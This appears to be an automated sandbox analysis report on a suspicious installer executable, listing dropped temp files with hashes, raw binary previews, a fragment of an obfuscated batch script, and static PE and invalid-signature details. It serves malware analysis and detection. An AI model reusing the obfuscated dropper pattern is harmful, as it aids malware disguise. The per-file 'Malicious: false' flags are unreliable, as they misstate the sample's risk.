Preview:	.......'`+.."w..U,[....9]\|...i.......K.....;......?h......KqR.Tw..yM..D...W..G.....?q=..0.=..@........"..\|1...Z...m!G_...............{e..0.CV.C..dN(.8sv....q.....4S..0.V.s...V ^..........D.9.x..\|...'t..1.....lf..4..2_.&}B(N...:R.......R0.Q>.O..c\|M...H.:..zgR.d..C....X....y.V...N...f^...:.9.%kLd ........\|....6.<D..@.q.........m...l...>.r.:..U.....v......k.f...kQ..Qx3.$...[;..^o...F.?'.".(...p{'\|..>..Y...$y..P..H..i"..\j.?....!A............f..Tw...,m.,....V..:u.c/<.i..d...<d.H.m..a.K.c.]n..kwo(.T\|m....8d...[..JGs.,=.....n.4..6i\.e....-....n..l..o..h&8..@..6W.........\..b$..K...K../...r.....ii...e....5.vVa.J3....RbJ\|.7` ^...s..{..'1..ycW....-.....D...$7.....8.W.K.W!,U..!..[7...U..JK..<..L@.......j..?}v..V(.L.eOQ.P.l>.q..Z6.Y.2...(o...D............v*....F.....A..Wt0.....,..7.K.r$..`.~Q/#(.._..T.)KX_...piV$.-.@..e.$....1.....~.K......].rP....,.k.`.).....?R.A..fTY.....6.mC.J<...Up.t...T.>...)....Yo"...._.......F....>(.....e.......{Y..^b...4KHi..

C:\Users\user\AppData\Local\Temp\Page

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	145408
Entropy (8bit):	4.790182743077724
Encrypted:	false
SSDEEP:	768:A/mex/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3EYr8qL:QPdKaj6iTcPAsAhxjgarB/5el3EYrf
MD5:	849DA478EC3B54458595EBC4797F5A03
SHA1:	C88AA82B39FB85D77801370B5DCA64A01CEF7293
SHA-256:	9F080E2CB1C50C9646279CB6943BBF35016E61C89F5437EBFE32466109AAA291
SHA-512:	BFEABD47308F352A5FABAA04E443A7D6A7A7E94F99D443E6B01D229D6DF2B6D718C3651FA115405EBA8D1CC22B2D0003F4B6F25AAC631EF4F662D1DBE89451DB
Malicious:	false
Preview:	...k...................................m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.n.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.o.p.o.p.k.q.o.p.r.r.s.t.t.t...u.r.r.r.r.q...v...w.w.w.r.x.r.y.y.z.{.\|.{.{.}.{.{.~.....{...{.{.{.....r...{.{...{.{...{.{.........z...............................................................................o.p.o.p.o.p.o.p.o.p...........................................o.p...o.p.z.................................................................................................................................................................................................................................................................................m.m....................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Priorities

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	68608
Entropy (8bit):	6.329823926458593
Encrypted:	false
SSDEEP:	1536:FZPp7HE+tKA3QkvyNf7Xw2U0pkzUWBh2zGc/xv5mjKul:zxyA3laW2UDQWf05mjV
MD5:	B212537407FE3AEA1F37210F2C97FB34
SHA1:	46029A7BD80781BF385138EC72A3AA0017B63119
SHA-256:	0F88EFBB006B3B8924CB853643F944C7D1BC0E16162A8C9BB82483E8D65A4306
SHA-512:	9D314912490B65F2933967A3350A42FD7B378ACA42D7449F05B0C1D1E9CBD79601C9939E71445AD918054314D02FE43CED13E0AA3B60953653751D53EE76A8FC
Malicious:	false
Preview:	J...<.L...A...@.L.......D.L.......H.L.......L.L.....f..P.L.....T.L...I...`.L..o@...d.L.......h.L.......l.L.......p.L.....f..t.L.....x.L...I.....L.{.G.....L.........L.........L.........L.....f....L.......L...I.....L..G.....L.........L.........L.........L.....f....L.......L.d.I.....L.z.G.....L.........L.........L.........L.....f....L.......L...I.....L..G.....L.........L.........L.........L.....f....L.......L...I.....L..G.....L.........L....... .L.......$.L.....f..(.L.....,.L.t.I...8.L.5.G...<.L.......@.L.......D.L.......H.L.....f..L.L.....P.L...J...\.L...G...`.L.......d.L.......h.L.......l.L.....f..p.L.....t.L.0.J.....L.j.G.....L.........L.........L.........L.....f....L.......L.x.I.....L..G.....L.........L.........L.........L.....f....L.......L.`.J.....L...G.....L.........L.........L.........L.....f....L.......L.\|.I.....L.3.G.....L.........L.........L.........L.....f....L.......L...J.....L...G.....L.........L.........L....... .L.....f..$.L.....(.L...I...4.L...G...8.L.......<.L.......

C:\Users\user\AppData\Local\Temp\Rating

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	137216
Entropy (8bit):	6.668271513419496
Encrypted:	false
SSDEEP:	3072:MBRtNPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESvV:GNPj0nEo3tb2j6AUkB0CThp6vV
MD5:	5ED11C4B626451B04C76471C60785363
SHA1:	1FA1BED97199F5366176A4F3E61552323102ACAE
SHA-256:	2601FBCBC756E49DD60F311B322BF80A6F1C7F4137C263097C5BF67162433AE2
SHA-512:	2D0D5193E7BEE25DDD703BF59F6753838A279E72BCA8EB64FF384B0D94221015152631A0EA3BF8F8881140FEBF389C27769040A212EDA2326925DBC9CEE88AD4
Malicious:	false
Preview:	........VPW.]...U.....j.Y...E.f......x.f.....E.f.....B!f......"..;E...."...}...].t%......t............VPW.5]...U.....f.....>.u..x..E.f.1...j.f..X..E..y.+E..E....j...........B%f..Y.Z".............SPW..\.....j.Y.S"...E........Pwnt)j.Y;.......j Y;.v.j)Y;.t...6t.jCY;........}......1L..E...H.M.tsf.A......f#.....f;.u].A....M..E...I...H.E..Fj][;.t.jm[;.v8jo[;.v.jpXf;.u)..E.".!.E.j.Y..@.f;.t.j.Yf;.t.j...j.X.E..M...+..........!.....jv^;.s....[L...t....f...].u.3..u(f...u..M.j.^.......E.......WP...P.t...U..N....j.X..E.jxf...K.Xf....f....E..U.f.H..u...!..3..E...E.t..}..u..M...M..j...j.Yf......#...E(.@`......[....E...@....B....U..E...........j.f..f#.....f;...O....u.f..^f.........;.....D...9U.t'.....;.v..................U....M.......M.f........f.......U.........F 3.+F..u......j<_.u.f9>.V.j>...E.K.U.X........j+Y.].f;.t#j-Yf;.t.j0Yf;.r.j9Yf;.v..E.E..o....~......f;.p...r!j.[j9Zf;.w........f;.p...s.U..].f9.........u....j+X...M.].f;........r.j0.u....Zf;.r.j9Zf;.v..E.j?Z........r..u

C:\Users\user\AppData\Local\Temp\Reliability

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	129024
Entropy (8bit):	6.657813209880497
Encrypted:	false
SSDEEP:	3072:a4CE0Imbi80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHF:fClbfSCOMVIPPL/sZ7HS3zJ
MD5:	1BF9441983742C8780AB9CBEA7CECD89
SHA1:	43D35EC6EAC2236590A4E1CAFE9561C55E56D010
SHA-256:	AE0BDB2202869D1B4A823AF93EEB97E1A6A2A0C2D44DFAF91F690BACC1B33DDD
SHA-512:	2DD2A71B448DA383AEFC47B0127752BD17246993D5149298248E9EA2B052E24E49D1A6303DD14632388FB7235D11FFBAEDC0793F4EC96DF19F24F9E8173A7C42
Malicious:	false
Preview:	.E....}..t.....J.....p.J.[...u*;.~&....!W..I.....E.Yt..4...J....4.l.J..u kE$<.E(k.<.E,i......E0.}..u..5..L....L..=..L._^..]...L..E.P.5..L.....Y..uDiE.........L......L.y....\&.....L.....\&.;.\|.+.....L.....L..=..L..j.j.j.j.j..n....U....SV......e....e...E.P.]..B...Y.........E.P.....Y..........."M..u...t4....:.u...t..X.:Y.u.........u.3............D....].R..o..Y..Q...A..u.+.A.P."~..j..."M..o....."M.YY..........W.y...A..u.+.V.A.PR.n.............j._WVj@.3.................>.t.F...u..>-_....t.FV...Yi......M...<+t.<0\|.<9..F..>:uBFV...k.<Y.M...M...<9..F..<0}..>:u.FV.a...Y.M...M...<9..F..<0}...t...M.3.8.....E...E.t.j.Vj@.p..N........t.. .@.....u..M....0.u..7....0^[..].3.PPPPP..l....U....SV.%.....3.E..].P.]..]..m...Y...."....E.P.....Y.........E.P.....Y.........5."M..4n....."M...$."M.....I..........k.."M.<..l"M.W3.G.=."M..M.f9.^"M.t.k.<..M.f9.."M.t..."M...t.+.}.k.<.E....]..].. ......E.PSj?.6j.h."M.SW....I...t.9].u....X?.......E.PSj?.v.j.hp"M.SW....I._..t.9].u..F..X?...F.

C:\Users\user\AppData\Local\Temp\Remote

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	81920
Entropy (8bit):	6.48430304300997
Encrypted:	false
SSDEEP:	1536:g1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzdlDfFgQa8BpDzP:gZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/P
MD5:	AE602F582EC8B5D0D56CC531D658DF4B
SHA1:	85D748AE045139B463146C412436E4B95D03B350
SHA-256:	CA490CCA0A853ED6F00F791A65E61AA478154968259B06E8D6CEEDA76D006D67
SHA-512:	19A05A40539685A1EB1346476337E0E0A8D44128A609F94551E070F82C5051ABF1A93E978A573D1BFDA2F2627ADCE7BB747E849CF0E8221B52E0B54BD9AC4775
Malicious:	false
Preview:	........................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..\|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F\|U............[............u......3........................l.....p.....t.....x.....\|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.

C:\Users\user\AppData\Local\Temp\Tutorial

Download File

Process:	C:\Users\user\Desktop\installer_1.05_37.4.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	7.9976739929059475
Encrypted:	true
SSDEEP:	1536:fvm/E2nMLHsLIwkhwZJO5NJsgeOj63m074r7hncr7gOQgRnTp:fvm/E2nMLHsL36VVkN4r1qnt
MD5:	36DA83A9B17EB16AFCAB4FCE116634BA
SHA1:	E5F806CE81683A7B12D6AFCB900A440224C3FFBA
SHA-256:	EAF7F69ED7CC6190D37788A127613EC90D3F9AD822B1F913E90CBF1B32613A6E
SHA-512:	250A6D82F1D2488808FED88F23CD83F6C45504B190CB5606DF6FEC628C9667357D2A850ED4631C6A9090B9105DD6646930552CFDC0437C2164B1E5439144B0F4
Malicious:	false
Preview:	.P..2I...\|;.!.$..^....TF.kP..8.......@...O.I.W.....}...........:......W.......<r.9@i........D].:S..v8.iYC:.k..:.O..(u.%........6.[.!..{.M#..%......^.I..[.....b.K...}D.....p....W.F.!y.LH......~.....f...[1...7.Q.?=i..2.f.\|x.X\.Xv.e.7...?.=.......9...G.....?.Z_c._..m..~. ...6!wz."xT3.KD...&Co.t.9.Z.p..b.I......o.`k.lI@..6K.C.....Y<.Ij..L..hf..H..6.....M.(.x..$.o.J.;....;.....;..th.\PZ..:.Y.$.<....%_...........>6....(.FE....(....&..5{.7.......PO.A)h.I.YR..G..+.X.~.2od>.J.v..`'.j.....TL5.4.:.....u+..Y..z@.....t.mZY.{8w..Z..zGF:....@L..b...`\...k:.4...h.:-..<..,z....#..V.WV...w.....U..7.OB..,..O...{.U.7..u..l[w~[q@.].fk......X...jG4.yZ.\.V.HFj).I...(r.W.vJ.}..@....H.9....r.=..<.[d.a"....D.$...@.....u..b..P.v..?v.o.Y(...=rf.........g(.z.>..I(..;....i.5Xg..&........J\~~5...w........GN...a...$.UI.pv....6...^...RZ.yc)...dw....A...m.u.m.J......?{.V..f..\^......?....6o.D.....:{..J...%...X...K@..c~=.........5h..._<.r$.i.o....:6...1..5.0

C:\Users\user\AppData\Local\Temp\Unexpected

Download File

Process:	C:\Users\user\Desktop\installer_1.05_37.4.exe
File Type:	ASCII text, with very long lines (741), with CRLF line terminators
Category:	dropped
Size (bytes):	15873
Entropy (8bit):	5.135834123615694
Encrypted:	false
SSDEEP:	384:eAlA42zCSxNVhjR/w53gQOrD9j0egmPkFm8yaRPuO2eZsF:eOA42hz9Zw5wQOrd9qRPuO2euF
MD5:	63515F866844B279CEF96864CB3348C0
SHA1:	2276F6B26044EB3FF252FAB4ECE7A52B47B1E37C
SHA-256:	56331384E114B80D7F259411EF2B64C412206B5AD0680321F15387E37472CC7C
SHA-512:	E3DF3CC2E447538009851F233C74FB54F51C3462647090824CC63043B872D3BB545AAB11E65288681811A1346D34A3A7FA72A0A5E3DF5857B59BABB7A2846630
Malicious:	false
Preview:	Set Filing=i..MfVitamins-Plaza-Record-Jewish-Relationship-Purchased-Rolls-Combining-..cXldIslam-Lift-Agrees-Obvious-Tight-Training-Denmark-Like-..bFrTRr-Latinas-Ins-Certificate-Strategies-..CoaDeviation-Ottawa-Congo-Applies-Ir-Displayed-Vault-..dKeBeat-Onion-Staffing-Ghana-..Set Secretariat=j..pNXtFire-Responsibility-Installations-Teens-..CUlERon-Honey-Kilometers-Interview-Debut-Canon-..xFAdHoldem-Implies-Eg-Termination-Cherry-Evans-Zimbabwe-Dir-..AdrFinishing-Screen-Lauderdale-Satin-..PwEGrow-Namespace-J-Statistical-Dividend-No-..asDLaws-..qEGirls-..ldeBoard-Holes-Alerts-..Set Brain=F..RsInventory-Pass-..pKTMai-Diploma-Even-Cork-Urgent-Sample-Antenna-Browser-Fur-..lRAuthentic-Viewing-..LQOrganizing-Legs-..uvMCopyright-Vitamins-Delivers-Stereo-Mothers-Logan-Annual-..feComplicated-..AnIContacting-Spam-Aaron-Chubby-Biodiversity-Length-Monitor-Str-French-..Set Brooklyn=h..hVDiscussed-Beings-..LlTnVariation-..LoKlAta-Dept-..vGbIHazardous-Employ-Senate-Leaves-Cake-Jr-Processing-..NpRidge-..

C:\Users\user\AppData\Local\Temp\Unexpected.cmd (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (741), with CRLF line terminators
Category:	dropped
Size (bytes):	15873
Entropy (8bit):	5.135834123615694
Encrypted:	false
SSDEEP:	384:eAlA42zCSxNVhjR/w53gQOrD9j0egmPkFm8yaRPuO2eZsF:eOA42hz9Zw5wQOrd9qRPuO2euF
MD5:	63515F866844B279CEF96864CB3348C0
SHA1:	2276F6B26044EB3FF252FAB4ECE7A52B47B1E37C
SHA-256:	56331384E114B80D7F259411EF2B64C412206B5AD0680321F15387E37472CC7C
SHA-512:	E3DF3CC2E447538009851F233C74FB54F51C3462647090824CC63043B872D3BB545AAB11E65288681811A1346D34A3A7FA72A0A5E3DF5857B59BABB7A2846630
Malicious:	false
Preview:	Set Filing=i..MfVitamins-Plaza-Record-Jewish-Relationship-Purchased-Rolls-Combining-..cXldIslam-Lift-Agrees-Obvious-Tight-Training-Denmark-Like-..bFrTRr-Latinas-Ins-Certificate-Strategies-..CoaDeviation-Ottawa-Congo-Applies-Ir-Displayed-Vault-..dKeBeat-Onion-Staffing-Ghana-..Set Secretariat=j..pNXtFire-Responsibility-Installations-Teens-..CUlERon-Honey-Kilometers-Interview-Debut-Canon-..xFAdHoldem-Implies-Eg-Termination-Cherry-Evans-Zimbabwe-Dir-..AdrFinishing-Screen-Lauderdale-Satin-..PwEGrow-Namespace-J-Statistical-Dividend-No-..asDLaws-..qEGirls-..ldeBoard-Holes-Alerts-..Set Brain=F..RsInventory-Pass-..pKTMai-Diploma-Even-Cork-Urgent-Sample-Antenna-Browser-Fur-..lRAuthentic-Viewing-..LQOrganizing-Legs-..uvMCopyright-Vitamins-Delivers-Stereo-Mothers-Logan-Annual-..feComplicated-..AnIContacting-Spam-Aaron-Chubby-Biodiversity-Length-Monitor-Str-French-..Set Brooklyn=h..hVDiscussed-Beings-..LlTnVariation-..LoKlAta-Dept-..vGbIHazardous-Employ-Senate-Leaves-Cake-Jr-Processing-..NpRidge-..

C:\Users\user\AppData\Local\Temp\Webshots

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	73839
Entropy (8bit):	7.1167728551531
Encrypted:	false
SSDEEP:	1536:7Wyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:7Wy4ZNoGmROL7F1G7ho2kOb
MD5:	BA4BD6472D1F50FF03BEBBBAAE89B22C
SHA1:	29DB7366A8DB226219C1DE45D2B7DF6265730331
SHA-256:	0EBC95D7954ABA8429745ED50884CD0629673BE34386AA7C0CBAC5A9A5B7AA02
SHA-512:	943B54ACA2D2AC1400A21EEDA356A34FCC1C85F93A3716423D169FFA0693BB7EB61FE4B0A4F99BECD8AEE7F944A3E4840542464788D87AEB8ACFF93FCBC43037
Malicious:	false
Preview:	.Ej..O..j;....Z..q.MU...<...=.........1....v....:.....y<...#..g.>.0.m.\U.AD...kx.>(..U..c........G.[..MUMR-..........56T.K"..E.[...Nu.....MU.....GEd....C.6p..kU.........l....!.?.\|.j.N.[.......YU}>.H\....1;;..........k...9....O...l.f.-K..\|>c..?...B.C.K.y..X.yU./.a.E,..........W.=.i.:........\|..a...\.D"%.....l.UD>.\|.x.[... ^..?Q./l...!......0~....2.C.Y.(..Q.l..R.l,[)Wll...\......}.....R.i.>..4..i........m.<.U...\|..H.{...(..-.m.P....Ts..4J....2..%V.K...YY/.]..Vbu.D.R5..eS.m....*...Ak. 5.7.!.3...70...i.3..... .. ........DB~".....E......m.~#.L.{............(..T.Y/V.._frq......u..6J...E.lQ,W(U....u[0...I._...>Z.&....h.T....0...B.-[U.....=..x<........k.D".$"?.........ln...e.....SX+Q.X....\H.Y=B.\|&.....1....:"t&...`...Z..?...Q....C..B..m....d.{1e.X..V.p}:..,.s,-o`..}G......X8.pO....;..>Z.>\|..4.ATU..e..eY.....@}].A....'h...e..V".Z..L.7..36[.X..%.A.I.g...)..b..-DB......Z..m..i..b.X.#.......a....~....+.e..k.]..d...e...T..)[.3.........&.HGI.B.C.f..5.K.gT..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.973899368678375
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	installer_1.05_37.4.exe
File size:	1'120'175 bytes
MD5:	a2e9824e77be1fbc29913ffd0b324823
SHA1:	42dd1e05ec49639d9d8ad318e732a66a1451fd6f
SHA256:	34c3a5d70230d93968cc2db047398cef644fb500740bbc20d09feb8e754ae197
SHA512:	d42a7f8c2d032a46dd664e6941c3496359ecc865d7a5394c782ecfd66fbd17b9bfefa1671068c869803c99cb9e00553242286c71b180341e003299d64ff4ed8c
SSDEEP:	24576:eAp1czyvnORvabmyJFMwOQ75wWkGR+1FaFEddGuL9NfSvtzH:lczyvORiRJxwJ1FYxG2lzH
TLSH:	A4352341CEE8A8AEDCD34D7D24630A178A37B6961CB4C2EF3700DD8639753416D397AA
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X\|.N.................n.......B...8.....

File Icon


Icon Hash:	7c347ccccc8cc8cc

Static PE Info

General

Entrypoint:	0x403883
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4E807C58 [Mon Sep 26 13:21:28 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	be41bf7b8cc010b614bd36bbca606973

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	24/09/2024 02:00:00 25/09/2027 01:59:59
Subject Chain	CN=Discord Inc., O=Discord Inc., L=San Francisco, S=California, C=US, SERIALNUMBER=5128862, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
Version:	3
Thumbprint MD5:	5D2A3557A29B3D769CD29535A5E3D35D
Thumbprint SHA-1:	6C7552617E892DFCA5CEB96FA2870F4F1904820E
Thumbprint SHA-256:	77E85A01A656323340749C2D61FA129C86DA12533CAC6A4FCF2C81C9D8D63A40
Serial:	0DE9CF2E718364A0062E0D83093E34D7

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 00409268h
mov dword ptr [esp+14h], ebp
call dword ptr [00408030h]
push 00008001h
call dword ptr [004080B4h]
push ebp
call dword ptr [004082C0h]
push 00000008h
mov dword ptr [00472EB8h], eax
call 00007FB8FCB118EBh
push ebp
push 000002B4h
mov dword ptr [00472DD0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 00409264h
call dword ptr [00408184h]
push 0040924Ch
push 0046ADC0h
call 00007FB8FCB115CDh
call dword ptr [004080B0h]
push eax
mov edi, 004C30A0h
push edi
call 00007FB8FCB115BBh
push ebp
call dword ptr [00408134h]
cmp word ptr [004C30A0h], 0022h
mov dword ptr [00472DD8h], eax
mov eax, edi
jne 00007FB8FCB0EEBAh
push 00000022h
pop esi
mov eax, 004C30A2h
push esi
push eax
call 00007FB8FCB11291h
push eax
call dword ptr [00408260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007FB8FCB0EF43h
push 00000020h
pop ebx
cmp ax, bx
jne 00007FB8FCB0EEBAh
add esi, 02h
cmp word ptr [esi], bx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9b34	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf4000	0xdf12	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x10ee37	0x2978
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7a000	0x964	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6dae	0x6e00	00499a6f70259150109c809d6aa0e6ed	False	0.6611150568181818	data	6.508529563136936	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x2a62	0x2c00	07990aaa54c3bc638bb87a87f3fb13e3	False	0.3526278409090909	data	4.390535020989255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb000	0x67ebc	0x200	014871d9a00f0e0c8c2a7cd25606c453	False	0.203125	data	1.4308602597540492	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x73000	0x81000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xf4000	0xdf12	0xe000	0f8e1efd7d78e9262551f823113980c6	False	0.8749128069196429	data	7.500514899491219	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x102000	0xf32	0x1000	e28dac45941a93ec616f8d1c4c70de5b	False	0.599609375	data	5.52646656481944	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xf4250	0x7617	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	English	United States	1.0005292580463763
RT_ICON	0xfb868	0x2514	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.001158870627897
RT_ICON	0xfdd7c	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792	English	United States	0.57740032546786
RT_ICON	0x1003e4	0x1128	Device independent bitmap graphic, 32 x 64 x 32, image size 4352	English	United States	0.6372950819672131
RT_ICON	0x10150c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.7703900709219859
RT_DIALOG	0x101974	0x100	data	English	United States	0.5234375
RT_DIALOG	0x101a74	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x101b90	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x101bf0	0x4c	data	English	United States	0.8026315789473685
RT_MANIFEST	0x101c3c	0x2d6	XML 1.0 document, ASCII text, with very long lines (726), with no line terminators	English	United States	0.5647382920110193

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
